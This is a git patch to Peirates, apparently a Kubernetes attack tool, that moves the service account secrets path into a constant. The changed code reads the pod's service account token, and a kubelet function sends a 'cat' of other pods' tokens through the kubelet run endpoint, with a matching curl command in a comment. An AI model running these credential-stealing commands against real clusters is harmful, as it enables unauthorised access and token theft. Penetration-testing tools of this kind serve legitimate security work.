From 2ea78bba11a28b59e23ca6909fb1b6940bb9009f Mon Sep 17 00:00:00 2001
From: Jay Beale <jay.beale@gmail.com>
Date: Thu, 13 Aug 2020 12:19:44 -0700
Subject: [PATCH] Set service account path to a const.

---
 config.go   | 9 ++++++---
 peirates.go | 4 +---
 2 files changed, 7 insertions(+), 6 deletions(-)

diff --git a/config.go b/config.go
index 661ef2e..b008a04 100644
--- a/config.go
+++ b/config.go
@@ -8,6 +8,8 @@ import (
 	"os"
 )
 
+const ServiceAccountPath = "/var/run/secrets/kubernetes.io/serviceaccount/"
+
 type ServerInfo struct {
 	RIPAddress string
 	RPort      string
@@ -27,7 +29,8 @@ func ParseLocalServerInfo() ServerInfo {
 	configInfoVars.RPort = os.Getenv("KUBERNETES_SERVICE_PORT")
 
 	// Reading token file and storing in variable token
-	token, errRead := ioutil.ReadFile("/run/secrets/kubernetes.io/serviceaccount/token")
+	const tokenFile = ServiceAccountPath + "token"
+	token, errRead := ioutil.ReadFile(tokenFile)
 	configInfoVars.Token = string(token)
 
 	//Error message If statement based on failure to read the file
@@ -36,7 +39,7 @@ func ParseLocalServerInfo() ServerInfo {
 	}
 
 	// Reading namespace file and storing in variable namespace
-	namespace, errRead := ioutil.ReadFile("/run/secrets/kubernetes.io/serviceaccount/namespace")
+	namespace, errRead := ioutil.ReadFile(ServiceAccountPath + "namespace")
 	if errRead != nil {
 		fmt.Println("Namespaces location error", errRead)
 	}
@@ -46,7 +49,7 @@ func ParseLocalServerInfo() ServerInfo {
 	configInfoVars.TokenName = "Pod ns:" + configInfoVars.Namespace + ":" + os.Getenv("HOSTNAME")
 
 	//Reading Ca.Crt File and storing in variable caCrt
-	configInfoVars.CAPath = "/run/secrets/kubernetes.io/serviceaccount/ca.crt"
+	configInfoVars.CAPath = ServiceAccountPath + "ca.crt"
 
 	return configInfoVars
 }
diff --git a/peirates.go b/peirates.go
index 4760b5b..2ab3bd6 100644
--- a/peirates.go
+++ b/peirates.go
@@ -885,8 +885,7 @@ func ExecuteCodeOnKubelet(connectionString ServerInfo, ServiceAccounts *[]Servic
 								// curl -sk https://10.23.58.41:10250/run/" + podNamespace + "/" + podName + "/" + containerName + "/ -d \"cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token\""
 
 								data := url.Values{}
-								data.Set("cmd", "cat /var/run/secrets/kubernetes.io/serviceaccount/token")
-								// data.Set("cmd", "hostname")
+								data.Set("cmd", "cat "+ServiceAccountPath+"token")
 
 								urlExecPod := "https://" + addr.Address + ":10250/run/" + podNamespace + "/" + podName + "/" + containerName + "/"
 
@@ -983,7 +982,6 @@ Interrogate/Abuse Cloud API's   |
 --------------------------------+
 [17] List AWS S3 Buckets accessible (Auto-Refreshing Metadata API credentials) [aws-s3-ls]
 [18] List contents of an AWS S3 Bucket (Auto-Refreshing Metadata API credentials) [aws-s3-ls-objects]
-
 -----------+
 Compromise |
 -----------+